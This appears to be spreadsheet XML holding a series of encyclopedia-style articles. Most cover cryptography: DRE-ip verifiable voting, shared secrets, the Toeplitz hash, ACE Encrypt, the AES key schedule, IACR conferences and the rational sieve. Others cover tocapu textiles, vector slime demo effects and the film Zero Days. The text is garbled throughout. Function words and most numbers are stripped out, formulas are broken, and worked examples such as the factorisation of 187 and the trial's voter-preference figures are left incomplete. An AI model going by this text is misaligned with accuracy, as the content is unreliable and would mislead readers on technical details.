{\displaystyle z_{i}} well-formed. this zero knowledge proof realized using technique ronald cramer, ivan damgård berry schoenmakers (also called technique). interactive technique made non-interactive applying fiat-shamir heuristics. second step, voter option either confirm cancel selection. case "confirm", updates aggregated values {\displaystyle {\displaystyle memory below, deletes individual values {\displaystyle r_{i}} {\displaystyle v_{i}} marks ballot "confirmed" receipt. {\displaystyle t=\sum v_{i},s=\sum r_{i}} case “cancel”, reveals {\displaystyle r_{i}} {\displaystyle v_{i}} receipt, marks ballot "cancelled" prompts voter choose again. voter check printed {\displaystyle v_{i}} matches previous selection raise dispute not. voter cancel many ballots wishes cast confirmed ballot. canceling option allows voter verify data printed receipt first step corresponds correct encryption voter's choice, hence ensuring vote "cast intended". this follows approach voter-initiated auditing proposed joshua benaloh. however, dre-ip, voter-initiated auditing realized without requiring voter understand cryptography (the voter merely needs check whether printed plaintext {\displaystyle v_{i}} correct). after voting finished, voter leaves voting booth receipt confirmed ballot zero receipts canceled ballots. data printed receipts also published mirrored public election website (also known public bulletin board) digital signature prove data authenticity. ensure vote "recorded cast", voter needs check receipt published election website. tallying once election finished, publishes final values {\displaystyle {\displaystyle election website, addition receipts. anyone able verify tallying integrity checking published audit data, particular, whether following equations hold. this ensures votes "tallied recorded", together earlier assurance "cast intended" "recorded cast" guarantees entire voting process "end-to-end verifiable". "end-to-end verifiable" voting system also said "software independent", phrase coined rivest. dre-ip system differs verifiable voting systems require tallying authorities, hence election management much simpler. {\displaystyle \prod r_{i}=g_{2}^{s}} {\displaystyle \prod z_{i}=g_{1}^{s}g_{1}^{t}} real-world trial touch-screen based prototype dre-ip implemented trialed polling station gateshead 2019 2019 united kingdom local elections. during trial, voters first voted normal using paper ballots. upon exiting polling station, invited participate voluntary trial using dre-ip e-voting system dummy election. average, took voter seconds cast vote dre-ip system. part trial, voters asked compare voting experiences using paper ballots dre-ip e-voting system, indicate system would prefer. among participating voters, chose "strongly prefer paper", chose "prefer paper", chose "neutral", chose "prefer e-voting", chose "strongly prefer e-voting". references</t>
  </si>
  <si>
    <t>Shared secret</t>
  </si>
  <si>
    <t>cryptography, shared secret piece data, known parties involved, secure communication. this usually refers symmetric cryptosystem. shared secret password, passphrase, number, array randomly chosen bytes. shared secret either shared beforehand communicating parties, case also called pre-shared key, created start communication session using key-agreement protocol, instance using public-key cryptography diffie–hellman using symmetric-key cryptography kerberos. shared secret used authentication (for instance logging remote system) using methods challenge–response derivation function produce keys encryption and/or macing messages. make unique session message keys shared secret usually combined initialization vector (iv). example derived unique transaction method. also often used authentication measure apis. also stretching method create stronger weak weak shared secret security question implementation method references handbook applied cryptography menezes, oorschot vanstone (2001), chapter</t>
  </si>
  <si>
    <t>Tocapu</t>
  </si>
  <si>
    <t>tocapu (tocapo tokapu) decorative artwork discrete geometrical motifs. associated andean textiles, especially royals' clothing. tocapu also painted wooden boards. motifs tocapu integral part various textiles used inca empire. designs woven fabrics. tocapu, nearly square frame inside field divided subdivided various geometric shapes. repeat setting repeat designs combined following suitability, example, repeating single design unit forming group units, band (for example, band bottom uncu) sometimes tocapu motifs given scattered also (without arrangement). study tocapu used incas always remained subject research assuming existence pictographic ideographic writing. about symbols signs tocapu evaluated decorative values. santacruz pachacuti yamqui explained gallery references</t>
  </si>
  <si>
    <t>Toeplitz Hash Algorithm</t>
  </si>
  <si>
    <t>toeplitz hash algorithm describes hash functions compute hash values matrix multiplication suitable toeplitz matrix. toeplitz hash algorithm used many network interface controllers receive side scaling.as example, toeplitz matrix {\displaystyle {\displaystyle results hash {\displaystyle follows: {\displaystyle h=t\cdot k={\begin{pmatrix}1&amp;1&amp;0&amp;1\\0&amp;1&amp;1&amp;0\\1&amp;0&amp;1&amp;1\\\end{pmatrix}}\cdot {\begin{pmatrix}1\\1\\0\\0\\\end{pmatrix}}={\begin{pmatrix}0\\1\\1\\\end{pmatrix}}} entries bits operations modulo implementations highly redundant matrix necessarily explicitly stored. references</t>
  </si>
  <si>
    <t>ACE Encrypt</t>
  </si>
  <si>
    <t>(advanced cryptographic engine) collection units, implementing public encryption scheme digital signature scheme. corresponding names schemes «ace encrypt» «ace sign». schemes based cramer-shoup public encryption scheme cramer-shoup signature scheme. introduced variants schemes intended achieve good balance performance security whole encryption system. authors algorithms, implemented based algorithms developed victor shoup ronald cramer. full algorithms specification written victor shoup. implementation algorithms done thomas schweinberger mehdi nassehi, supporting maintaining done victor shoup. thomas schweinberger participated construction specification document also wrote user manual. ronald cramer currently stays university aarhus, denmark. worked project encrypt staying zürich, switzerland. mehdi nassehi thomas schweinberger worked project research zürich, switzerland. victor shoup works research zürich, switzerland. security encryption scheme proven secure reasonable natural intractability assumptions. these four assumptions are: decisional diffie-hellman (ddh) assumption strong assumption sha-1 second preimage collision resistance mars sum/counter mode pseudo-randomness basic terminology notation here introduce notations, used article. basic mathematical notation {\displaystyle \mathbb integers. {\displaystyle f_{2}[t]} univariate polynomials coefficients finite field {\displaystyle f_{2}} cardinality {\displaystyle a\operatorname {rem} integer {\displaystyle r\in \left\{0,\dots ,n-1\right\}} {\displaystyle a\equiv r{\pmod {n}}} integer {\displaystyle n&gt;0} {\displaystyle a\in \mathbb {\displaystyle a\operatorname {rem} polynomial {\displaystyle r\in f_{2}[t]} {\displaystyle \deg(r)&lt;\deg(f)} {\displaystyle a\equiv r{\pmod {f}}} {\displaystyle a,f\in f_{2}[t],f\neq basic string notation {\displaystyle a^{\ast strings. {\displaystyle a^{n}} strings length {\displaystyle x\in a^{\ast }l(x)} length string {\displaystyle string length zero denoted {\displaystyle \lambda _{a}} {\displaystyle x,y\in a^{\ast {\displaystyle x\|y} result {\displaystyle {\displaystyle concatenation. bits, bytes, words {\displaystyle b{\overset {\text{def}}{{}={}}}\left\{0,1\right\}} bits. take sets form {\displaystyle b,b^{n_{1}},(b^{n_{1}})^{n_{2}},...} define "zero element": define {\displaystyle b{\stackrel {\mathrm {def} }{{}={}}}b^{8}} bytes, {\displaystyle w{\stackrel {\mathrm {def} }{{}={}}}b^{32}} words. {\displaystyle x\in a^{\ast {\displaystyle a\in \left\{b,b,w\right\}} {\displaystyle l&gt;0} define padding operator: conversion operator conversion operator {\displaystyle i_{src}^{dst}:src\to dst} makes conversion elements {\displaystyle z,f_{2}[t],b^{\ast },b^{\ast },w^{\ast encryption scheme encryption pair encryption scheme employs types: public key: {\displaystyle (p,q,g_{1},g_{2},c,d,h_{1},h_{2},k_{1},k_{2})} private key: {\displaystyle (w,x,y,z_{1},z_{2})} given size parameter {\displaystyle 1024 16384 {\displaystyle 1024\leq m\leq 16384} components defined {\displaystyle 256-bit prime number. {\displaystyle m-bit prime number, {\displaystyle p\equiv 1{\pmod {q}}} {\displaystyle g_{1},g_{2},c,d,h_{1},h_{2}} elements {\displaystyle \left\{1,\dots ,p-1\right\}} (whose multiplicative order modulo {\displaystyle divides {\displaystyle {\displaystyle w,x,y,z_{1},z_{2}} elements {\displaystyle \left\{0,\dots ,q-1\right\}} {\displaystyle k_{1},k_{2}} elements {\displaystyle b^{\ast {\displaystyle l(k_{1})=20l'+64} {\displaystyle l(k_{2})=32\left\lceil l/16\right\rceil +40} {\displaystyle l=\left\lceil m/8\right\rceil {\displaystyle l'=l_{b}(\left\lceil (2\left\lceil l/4\right\rceil +4)/16\right\rceil generation algorithm. generation encryption scheme. input: size parameter {\displaystyle 1024 16384 {\displaystyle 1024\leq m\leq 16384} output: public/private pair. generate random prime {\displaystyle {\displaystyle 2^{255}&lt;q&lt;2^{256}} generate random prime {\displaystyle {\displaystyle 2^{m-1}&lt;p&lt;2^{m}} {\displaystyle p\equiv 1(modq)} generate random integer {\displaystyle g_{1}\in \left\{2,...,p-1\right\}} {\displaystyle g_{1}^{q}\equiv 1(modp)} generate random integers {\displaystyle w\in \left\{1,...,q-1\right\}} {\displaystyle x,y,z_{1},z_{2}\in \left\{0,...,q-1\right\}} compute following integers {\displaystyle \left\{1,...,p-1\right\}} generate random byte strings {\displaystyle k_{1}\in b^{20l'+64}} {\displaystyle k_{2}\in b^{2\left\lceil l/16\right\rceil +40}} {\displaystyle l=l_{b}(p)} {\displaystyle l'=l_{b}(\left\lceil (2\left\lceil l/4\right\rceil +4)/16\right\rceil return public key/private pair ciphertext representation ciphertext encryption scheme form components defined {\displaystyle u_{1},u_{2},v} integers {\displaystyle \left\{1,...,p-1\right\}} (whose multiplicative order modulo {\displaystyle divides {\displaystyle {\displaystyle element {\displaystyle w^{4}} {\displaystyle element {\displaystyle b^{\ast {\displaystyle s,u_{1},u_{2},v} call preamble, {\displaystyle cryptogram. cleartext string consisting {\displaystyle байт, length {\displaystyle equal 1024 {\displaystyle l+16\left\lceil l/1024\right\rceil need introduce function {\displaystyle cencode} maps ciphertext byte-string representation, corresponding inverse function {\displaystyle cdecode} integer {\displaystyle l&gt;0} word string {\displaystyle s\in w^{4}} integers {\displaystyle 0\leq u_{1},u_{2},v&lt;256^{l}} byte string {\displaystyle e\in b^{\ast integer {\displaystyle l&gt;0} byte string {\displaystyle \psi b^{\ast {\displaystyle l(\psi )\geq 3l+16} encryption process algorithm. asymmetric encryption operation. input: public {\displaystyle (p,q,g_{1},g_{2},c,d,h_{1},h_{2},k_{1},k_{2})} byte string {\displaystyle m\in b^{\ast output: byte string ciphertext {\displaystyle \psi {\displaystyle generate {\displaystyle r\in \left\{0,...,q-1\right\}} random. generate ciphertext preamble: generate {\displaystyle s\in w^{4}} random. compute {\displaystyle u_{1}\leftarrow g_{1}^{r}remp} {\displaystyle u_{2}\leftarrow g_{2}^{r}remp} compute {\displaystyle \alpha \leftarrow uowhash^{\prime }(k_{1},l_{b}(p),s,u_{1},u_{2})\in note {\displaystyle 0&lt;\alpha &lt;2^{160}} compute {\displaystyle v\leftarrow c^{r}d^{\alpha r}remp} compute symmetric encryption operation: {\displaystyle {\tilde {h_{1}}}\leftarrow h_{1}^{r}remp} {\displaystyle {\tilde {h_{2}}}\leftarrow h_{2}^{r}remp} compute {\displaystyle k\leftarrow eshash(k,l_{b}(p),s,u_{1},u_{2},{\tilde {h_{1}}},{\tilde {h_{2}}})\in w^{8}} compute cryptogram 1024 {\displaystyle e\leftarrow senc(k,s,1024,m)} encode ciphertext: return {\displaystyle \psi before starting symmetric encryption process, input message {\displaystyle m\in b^{\ast divided blocks {\displaystyle m_{1},...,m_{t}} block, possibly except last one, 1024 bytes. each block encrypted stream cipher. encrypted block {\displaystyle e_{i}} 16-byte message authentication code computed. cryptogram note {\displaystyle l(m)=0} {\displaystyle l(e)=0} algorithm. asymmetric encryption process. input: {\displaystyle (k,s,m,m)\in w^{8}\times w^{4}\times z\times b^{\ast {\displaystyle m&gt;0} output: {\displaystyle e\in b^{l}} {\displaystyle l=l(m)+16\left\lceil l(n)/m\right\rceil {\displaystyle m=\lambda _{b}} return {\displaystyle \lambda _{b}} initialize pseudo-random generator state: generate {\displaystyle k_{axu}axuhash} {\displaystyle e\leftarrow \lambda _{b},i\leftarrow while {\displaystyle i&lt;l(m)} following: {\displaystyle r\leftarrow min(l(m)-i,m)} generate mask values encryption mac: {\displaystyle (mask_{m},genstate)\leftarrow genwords(4,genstate)} {\displaystyle (mask_{e},genstate)\leftarrow genwords(r,genstate)} encrypt plaintext: {\displaystyle enc\leftarrow {\bigl [}m{\bigr ]}_{i}^{i+r}\oplus mask_{e}} generate message authentication code: {\displaystyle i+r=l(m)} {\displaystyle lastblock\leftarrow else {\displaystyle lastblock\leftarrow {\displaystyle mac\leftarrow axuhash(k_{axu},lastblock,enc)\in w^{4}} update ciphertext: {\displaystyle e\leftarrow e||enc||i_{w^{\ast }}^{b^{\ast }}(mac\oplus mask_{m})} {\displaystyle i\leftarrow i+r} return {\displaystyle decryption process algorithm. decryption process. input: public {\displaystyle (p,q,g_{1},g_{2},c,d,h_{1},h_{2},k_{1},k_{2})} corresponding private {\displaystyle (w,x,y,z_{1},z_{2})} string {\displaystyle \psi b^{\ast output: decrypted message {\displaystyle m\in b^{\ast }\cup {reject}} decrypt ciphertext: {\displaystyle l(\psi )&lt;3l_{b}(p)+16} return {\displaystyle reject} compute: note {\displaystyle 0\leq u_{1},u_{2},v&lt;256^{l}} {\displaystyle l=l_{b}(p)} verify ciphertext preamble: {\displaystyle u_{1}\geq {\displaystyle u_{2}\geq {\displaystyle v\geq return {\displaystyle reject} {\displaystyle u_{1}^{q}\neq 1remp} return {\displaystyle reject} {\displaystyle reject\leftarrow {\displaystyle u_{2}\neq u_{1}^{w}remp} {\displaystyle reject\leftarrow compute {\displaystyle \alpha \leftarrow uowhash^{\prime }(k_{1},l_{b}(p),s,u_{1},u_{2})\in note {\displaystyle 0\leq \alpha \leq 2^{160}} {\displaystyle v\neq u_{1}^{x+{\alpha }y}remp} {\displaystyle reject\leftarrow {\displaystyle reject=1} return {\displaystyle reject} compute symmetric decryption operation: {\displaystyle {\tilde {h_{1}}}\leftarrow u_{1}^{z_{1}}remp} {\displaystyle {\tilde {h_{2}}}\leftarrow u_{1}^{z_{2}}remp} compute {\displaystyle k\leftarrow eshash(k_{2},l_{b}(p),s,u_{1},{\tilde {h_{1}}},{\tilde {h_{2}}})\in w^{8}} compute 1024 {\displaystyle m\leftarrow sdec(k,s,1024,e)} ;note {\displaystyle sdec} return {\displaystyle reject} return {\displaystyle .algorithm. decryption operation {\displaystyle sdec} input: {\displaystyle (k,s,m,e)\in w^{8}\times w^{4}\times z\times b^{\ast {\displaystyle m&gt;0} output: decrypted message {\displaystyle m\in b^{\ast }\cup {reject}} {\displaystyle e=\lambda _{b}} return {\displaystyle \lambda _{b}} initialize pseudo-random generator state: generate {\displaystyle k_{axu}axuhash} {\displaystyle m\leftarrow \lambda _{b},i\leftarrow while {\displaystyle i&lt;l(e)} following: {\displaystyle r\leftarrow min(l(e)-i,m+16)-16} {\displaystyle r\leq return {\displaystyle reject} generate mask values encryption mac: {\displaystyle (mask_{m},genstate)\leftarrow genwords(4,genstate)} {\displaystyle (mask_{e},genstate)\leftarrow genwords(r,genstate)} verify message authentication code: {\displaystyle i+r+16=l(m)} {\displaystyle lastblock\leftarrow else {\displaystyle lastblock\leftarrow {\displaystyle mac\leftarrow axuhash(k_{axu},lastblock,{\bigl [}e{\bigr ]}_{i}^{i+r})\in w^{4}} {\displaystyle {\bigl [}e{\big ]}r_{i+r}^{i+r+16}\neq i_{w^{\ast }}^{b^{\ast }}(mac\oplus mask_{m})} return {\displaystyle reject} update plaintext: {\displaystyle m\leftarrow m||({\bigl [}e{\bigr ]}_{i}^{i+r})\oplus mask_{e})} {\displaystyle i\leftarrow i+r+16} return {\displaystyle signature scheme signature scheme employs types: signature public key: {\displaystyle (n,h,x,e',k',s)} signature private key: {\displaystyle (p,q,a)} given size parameter {\displaystyle 1024 16384 {\displaystyle 1024\leq m\leq 16384} components defined following way: {\displaystyle {\displaystyle \left\lfloor m/2\right\rfloor -bit prime number {\displaystyle (p-1)/2} also prime number. {\displaystyle {\displaystyle \left\lfloor m/2\right\rfloor -bit prime number {\displaystyle (q-1)/2} also prime number. {\displaystyle {\displaystyle n=pq} either {\displaystyle {\displaystyle m-1} бит. {\displaystyle h,x} elements {\displaystyle \left\{1,...,n-1\right\}} (quadratic residues modulo {\displaystyle {\displaystyle 161-bit prime number. {\displaystyle element {\displaystyle \left\{0,...,(p-1)(q-1)/4-1\right\}} {\displaystyle elements {\displaystyle b^{184}} {\displaystyle elements {\displaystyle b^{32}} generation algorithm. generation public-key signature scheme. input: size parameter {\displaystyle 1024 16384 {\displaystyle 1024\leq m\leq 16384} output: public/private pair. generate random prime numbers {\displaystyle p,q} {\displaystyle (p-1)/2} {\displaystyle (q-1)/2} also prime number, {\displaystyle m_{1}=\left\lfloor m/2\right\rfloor {\displaystyle m_{1}=\left\lceil m/2\right\rceil {\displaystyle n\leftarrow generate random prime number {\displaystyle {\displaystyle 2^{160}\leq e'\leq 2^{161}} generate random {\displaystyle h'\in \left\{1,...,n-1\right\}} taking account {\displaystyle gcd(h',n)=1} {\displaystyle gcd(h'\pm 1,n)=1} compute {\displaystyle h\leftarrow (h')^{-2}remn} generate random {\displaystyle a\in \left\{0,...,(p-1)(q-1)/4-1\right\}} compute {\displaystyle x\leftarrow h^{a}remn} generate random byte strings {\displaystyle k'\in b^{184}} {\displaystyle s\in b^{32}} return public key/private pair signature representation signature signature scheme form {\displaystyle (d,w,y,y',{\tilde {k}})} components defined following way: {\displaystyle element {\displaystyle b^{64}} {\displaystyle integer, {\displaystyle 2^{160}\leq w\leq 2^{161}} {\displaystyle y,y'} elements {\displaystyle \left\{1,...,n-1\right\}} {\displaystyle {\tilde {k}}} element {\displaystyle b^{\ast ;note {\displaystyle l({\tilde {k}})=64+20l_{b}(\left\lceil (l(m)+8)/64\right\rceil {\displaystyle message signed. need introduce {\displaystyle sencode} function, maps signature byte string representation, corresponding inverse function {\displaystyle sdecode} integer {\displaystyle l&gt;0} byte string {\displaystyle d\in b^{64}} integers {\displaystyle 0\leq w\leq 256^{21}} {\displaystyle 0\leq y,y'&lt;256^{l}} byte string {\displaystyle {\tilde {k}}\in b^{\ast integer {\displaystyle l&gt;0} byte string {\displaystyle \sigma b^{\ast {\displaystyle l(\sigma )\geq 2l+53} signature generation process algorithm. signature generation process. input: public {\displaystyle (n,h,x,e',k',s)} corresponding private {\displaystyle (p,q,a)} byte string {\displaystyle m\in b^{\ast {\displaystyle 0\leq l(m)\leq 2^{64}} output: byte string digital signature {\displaystyle \sigma b^{\ast perform following steps hash input data: generate hash {\displaystyle {\tilde {k}}\in b^{20m+64}} random, {\displaystyle m=l_{b}(\left\lceil (l(m)+8)/64\right\rceil compute {\displaystyle m_{h}\leftarrow i_{w^{\ast }}^{z}(uowhash^{\prime \prime }({\tilde {k}},m))} select {\displaystyle {\tilde {y}}\in \left\{1,...,n-1\right\}} random, compute {\displaystyle y'\leftarrow {\tilde {y}}^{2}remn} compute {\displaystyle x'\leftarrow (y')^{r'}h^{m_{h}}remn} generate random prime {\displaystyle {\displaystyle 2^{160}\leq e\leq 2^{161}} certificate correctness {\displaystyle (w,d)} {\displaystyle (e,w,d)\leftarrow gencertprime(s)} repeat step {\displaystyle e\neq {\displaystyle r\leftarrow uowhash^{\prime \prime \prime }(k',l_{b}(n),x',{\tilde {k}})\in note {\displaystyle 0\leq r&lt;2^{160}} compute {\displaystyle y\leftarrow h^{b}remn} {\displaystyle p'=(p-1)/2} {\displaystyle q'=(q-1)/2} encode signature: return {\displaystyle \sigma notes definition encryption process signature process auxiliary function (e.g. uowhash, eshash other) used, definition goes beyond article. more details found implementation, utilization performance encryption scheme recommended nessie (new european schemes signatures, integrity encryption) asymmetric encryption scheme. press-release dated february 2003. both schemes implemented ansi library. tests done platforms: power model system pentium windows system. result tables: literature external links http://www.alphaworks.ibm.com/tech/ace http://www.zurich.ibm.com/security/ace/ nessie portfolio recommended cryptographic primitives</t>
  </si>
  <si>
    <t>Vector slime</t>
  </si>
  <si>
    <t>computer programming, vector slime refers class visual effects achieved procedural deformation geometric shapes. techniques appear programming demos. synopsis geometric object exposed vector slime usually defined vertices faces three dimensions. process deformation, vertex original shape undergoes linear transformations (usually rotation translation), defined function vertex' position space (usually function magnitude vector) time. desired result animated geometric object behaving harmonic way, creating degree illusion physical realism. older vector slime implementations kept copies rendering result simple vector objects ram, selected scan-lines different buffers order make time-displacement illusion y-axis. appearance depending variances implementation, vector slime approximate array physical properties. traditional approach linear transformation vary smooth function time minus magnitude vector question. this creates illusion force applied origin object space (where object usually centered), rest object's body reacts soft body, vertex reacts change force delayed distance origin. applied spikeball sphere extracted arms), object could resemble behaviour soft squid-like animal. applied cube, object would appear cubic piece jelly propelled gyro force inside. areas application although classical vector slime algorithms attempt correct physical modelling, result can, certain conditions, trick viewer believing sophisticated physical simulation involved. effect therefore grown quite popular demoscene create impressive visual effects relatively computational cost. interactive vector slime implementations also eventually found computer games substitute correct physical simulation algorithm. demos featuring vector slime crystal dream triton lethal exit digital (possibly first demo term) yuri nation alien nature-v (possibly first hardware vector slime) shapeshifter excess</t>
  </si>
  <si>
    <t>AES key schedule</t>
  </si>
  <si>
    <t>uses schedule expand short number separate round keys. three variants different number rounds. each variant requires separate 128-bit round round plus more. schedule produces needed round keys initial key. round constants round constant rconi round expansion 32-bit word: {\displaystyle rcon_{i}={\begin{bmatrix}rc_{i}&amp;00_{16}&amp;00_{16}&amp;00_{16}\end{bmatrix}}} eight-bit value defined {\displaystyle rc_{i}={\begin{cases}1&amp;{\text{if }}i=1\\2\cdot rc_{i-1}&amp;{\text{if }}i&gt;1{\text{ }}rc_{i-1}&lt;80_{16}\\(2\cdot rc_{i-1})\oplus {\text{11b}}_{16}&amp;{\text{if }}i&gt;1{\text{ }}rc_{i-1}\geq 80_{16}\end{cases}}} {\displaystyle \oplus bitwise operator constants 0016 11b16 given hexadecimal. equivalently: {\displaystyle rc_{i}=x^{i-1}} bits treated coefficients element finite field {\displaystyle {\rm {{gf}(2)[x]/(x^{8}+x^{4}+x^{3}+x+1)}}} e.g. 00110110 {\displaystyle rc_{10}=36_{16}=00110110_{2}} represents polynomial {\displaystyle x^{5}+x^{4}+x^{2}+x} uses rcon10 aes-128 round keys needed), rcon8 aes-192, rcon7 aes-256. schedule define: length 32-bit words: words aes-128, words aes-192, words aes-256 kn-1 32-bit words original number round keys needed: round keys aes-128, keys aes-192, keys aes-256 w4r-1 32-bit words expanded keyalso define rotword one-byte left circular shift: rotword {\displaystyle \operatorname {rotword} ({\begin{bmatrix}b_{0}&amp;b_{1}&amp;b_{2}&amp;b_{3}\end{bmatrix}})={\begin{bmatrix}b_{1}&amp;b_{2}&amp;b_{3}&amp;b_{0}\end{bmatrix}}} subword application s-box four bytes word: subword {\displaystyle \operatorname {subword} ({\begin{bmatrix}b_{0}&amp;b_{1}&amp;b_{2}&amp;b_{3}\end{bmatrix}})={\begin{bmatrix}\operatorname (b_{0})&amp;\operatorname (b_{1})&amp;\operatorname (b_{2})&amp;\operatorname (b_{3})\end{bmatrix}}} then {\displaystyle i=0\ldots 4r-1} subword rotword subword otherwise. {\displaystyle w_{i}={\begin{cases}k_{i}&amp;{\text{if }}i&lt;n\\w_{i-n}\oplus \operatorname {subword} (\operatorname {rotword} (w_{i-1}))\oplus rcon_{i/n}&amp;{\text{if }}i\geq n{\text{ }}i\equiv 0{\pmod {n}}\\w_{i-n}\oplus \operatorname {subword} (w_{i-1})&amp;{\text{if }}i\geq n{\text{, }}n&gt;6{\text{, }}i\equiv 4{\pmod {n}}\\w_{i-n}\oplus w_{i-1}&amp;{\text{otherwise.}}\\\end{cases}}} notes references fips 197: official standard (pdf file) external links description rijndael's schedule schematic view schedule keys 160-bit keys cryptography stack exchange</t>
  </si>
  <si>
    <t>International Cryptology Conference</t>
  </si>
  <si>
    <t>international association cryptologic research (iacr) non-profit scientific organization furthers research cryptology related fields. iacr organized initiative david chaum crypto conference. activities iacr organizes sponsors three annual flagship conferences, four area conferences specific sub-areas cryptography, symposium: crypto (flagship) eurocrypt (flagship) asiacrypt (flagship) fast software encryption (fse) public cryptography (pkc) cryptographic hardware embedded systems (ches) theory cryptography (tcc) real world crypto symposium (rwc)several conferences workshops held cooperation iacr. starting 2015, selected summer schools officially sponsored iacr. crypto first conference officially sponsored iacr. iacr publishes journal cryptology, addition proceedings conference workshops. iacr also maintains cryptology eprint archive, online repository cryptologic research papers aimed providing rapid dissemination results. asiacrypt asiacrypt (also asiacrypt) international conference cryptography research. full name conference currently international conference theory application cryptology information security, though varied time. asiacrypt conference sponsored iacr since 2000, three flagship conferences. asiacrypt held annually november december various locations throughout asia australia. initially, asiacrypt conferences called auscrypt, first held sydney, australia 1990, later community decide conference held locations throughout asia. first conference called "asiacrypt" held 1991 fujiyoshida, japan. cryptographic hardware embedded systems cryptographic hardware embedded systems (ches) conference cryptography research, focusing implementation cryptographic algorithms. general areas treated efficient secure implementation algorithms. related topics random number generators, physical unclonable function special-purpose cryptanalytical machines also commonly covered workshop. first held worcester, massachusetts 1999 worcester polytechnic institute (wpi). founded çetin kaya christof paar. ches 2000 also held wpi; that, conference held various locations worldwide. after ches' wpi, locations first years were, chronological order, paris, francisco, cologne, boston, edinburgh, yokohama, vienna, washington, d.c., lausanne. since 2009, ches rotates three continents europe, north america asia. attendance record ches 2018 amsterdam participants. eurocrypt eurocrypt eurocrypt) conference cryptography research. full name conference annual international conference theory applications cryptographic techniques. eurocrypt iacr flagship conferences, along crypto asiacrypt. eurocrypt held annually spring various locations throughout europe. first workshop series conferences became known eurocrypt held 1982. 1984, name "eurocrypt" first used. generally, published proceedings including papers conference every year, exceptions; 1983, proceedings produced, 1986, proceedings contained abstracts. springer published official proceedings, first part advances cryptology lecture notes computer science series. fast software encryption fast software encryption, often abbreviated fse, workshop cryptography research, focused symmetric-key cryptography emphasis fast, practical techniques, opposed theory. though "encryption" part conference title, limited encryption research; research symmetric techniques message authentication codes hash functions often presented there. iacr workshop since 2002, though first workshop held 1993. held annually various locations worldwide, mostly europe. dates workshop varied years, recently, held february. public cryptography public-key cryptography short name international workshop theory practice public cryptography (modified international conference theory practice public cryptography since 2006). theory cryptography theory cryptography conference, often abbreviated tcc, annual conference theoretical cryptography research. first held 2004 mit, also held 2005, times february. became iacr-sponsored workshop 2006. founding steering committee consists mihir bellare, ivan damgard, oded goldreich, shafi goldwasser, johan hastad, russell impagliazzo, ueli maurer, silvio micali, moni naor, tatsuaki okamoto. importance theoretical study cryptography widely recognized now. this area contributed much practice cryptography secure systems well theory computation large. needs theoretical cryptography (tc) community best understood relation communities resides: theory computation (toc) community cryptography/security community. three communities grown volume recent years. this increase volume makes hosting existing crypto conferences quite problematic. furthermore, perspectives crypto necessarily internal perspective interests indicate value establishment independent specialized conference. dedicated conference provides opportunities research dissemination interaction, helps shape field, give recognizable identity, communicate message. real world crypto symposium real world crypto symposium conference applied cryptography research, started 2012 kenny paterson nigel smart. winner levchin prize announced rwc.announcements made symposium include first known chosen prefix attack sha-1 inclusion end-to-end encryption facebook messenger. also, introduction chip took place rwc. flaws messaging apps whatsapp also presented there. international cryptology conference crypto, international cryptology conference, academic conference aspects cryptography cryptanalysis. held yearly august santa barbara, california university california, santa barbara.the first crypto held 1981. first major conference cryptology important relations government, industry academia rather tense. encryption considered sensitive subject coming together delegates different countries unheard-of time. initiative formation iacr came crypto '82, crypto first iacr sponsored conference. fellows iacr fellows program (fiacr) established honor bestow upon exceptional members. there currently iacr fellows. references external links iacr workshops page, contains links home pages 2002 bibliography 1993 iacr workshops page homepage bibliography data eurocrypt proceedings conference proceedings online, 1982-1997 asiacrypt/auscrypt bibliography 1990 iacr conferences page; contains links asiacrypt homepages 2000</t>
  </si>
  <si>
    <t>Zero Days</t>
  </si>
  <si>
    <t>zero days 2016 american documentary film directed alex gibney. selected compete golden bear 66th berlin international film festival. synopsis zero days covers phenomenon surrounding stuxnet computer virus development malware software known "olympic games." concludes discussion follow-up cyber plan nitro zeus iran nuclear deal. interviewees david sanger emad kiyaei, director external affairs american iranian council (aic), eric chien (symantec) liam o'murchu (symantec) colonel gary brown, staff judge advocate united states cyber command gary samore chris inglis, deputy director 2006-2014 amos yadlin yossi melman yuval steinitz eugene kaspersky vitaly kamluk michael hayden olli heinonen ralph langner, german control system security consultant richard clarke rolf mowatt-larssen seán paul mcgurk, department homeland security director cybersecurity 2008-2011 sergey ulasen (kaspersky belarus) reception review aggregator rotten tomatoes collected reviews 2017, positive. site's consensus states: "factors beyond gibney's control prevent zero days offering comprehensive look subject, partial picture emerges remains frightening impossible ignore." metacritic gave film score 77/100 based critics.writing rogerebert.com, godfrey cheshire praised zero days "easily important film anyone released year, documentary deserves seen every sentient citizen country—and indeed world." accolades zero days among films shortlisted academy award best feature documentary, ultimately receive oscar nomination. film documentary film peabody award 2017 nominated best documentary screenplay writers guild america. release zero days released digitally amazon video itunes december 2016, broadcast four storyville strand january 2017, january 2017. also faint heart: lessons courage, power persistence pragmatic entente: israeli-iranian relations, 1948-1988 references external links zero days imdb zero days rotten tomatoes</t>
  </si>
  <si>
    <t>Rational sieve</t>
  </si>
  <si>
    <t>mathematics, rational sieve general algorithm factoring integers prime factors. special case general number field sieve. while less efficient general algorithm, conceptually simpler. serves helpful first step understanding general number field sieve works. method suppose trying factor composite number choose bound identify factor base (which call primes less equal next, search positive integers b-smooth i.e. prime factors therefore write, suitable exponents {\displaystyle a_{i}} {\displaystyle z=\prod _{p_{i}\in p}p_{i}^{a_{i}}} likewise, suitable {\displaystyle b_{i}} {\displaystyle z+n=\prod _{p_{i}\in p}p_{i}^{b_{i}}} {\displaystyle {\displaystyle z+n} congruent modulo {\displaystyle integer find yields multiplicative relation (mod among elements i.e. {\displaystyle \prod _{p_{i}\in p}p_{i}^{a_{i}}\equiv \prod _{p_{i}\in p}p_{i}^{b_{i}}{\pmod {n}}} (where nonnegative integers.) when generated enough relations (it's generally sufficient number relations size methods linear algebra multiply together various relations exponents primes even. this give congruence squares form a2≡b2 (mod turned factorization gcd(a-b,n)×gcd(a+b,n). this factorization might turn trivial (i.e. n=n×1), case different combination relations; luck nontrivial pair factors algorithm terminate. example factor integer using rational sieve. we'll arbitrarily value b=7, giving factor base {2,3,5,7}. first step test divisibility members clearly divisible primes, finished already. however, divisible next, search suitable values first four suitable values give four multiplicative relations (mod 187): there several essentially different ways combine even exponents. example, (1)×(4): after multiplying canceling common factor (which since member already determined coprime reduces (mod (mod resulting factorization gcd(81-4,187) gcd(81+4,187) 11×17.alternatively, equation proper form already: (3): this says (mod gives factorization gcd(14-3,187) gcd(14+3,187) 11×17. limitations algorithm rational sieve, like general number field sieve, cannot factor numbers form prime integer. this huge problem, though—such numbers statistically rare, moreover simple fast process check whether given number form. probably elegant method check whether {\displaystyle \lfloor n^{1/b}\rfloor ^{b}=n} holds log(n) using 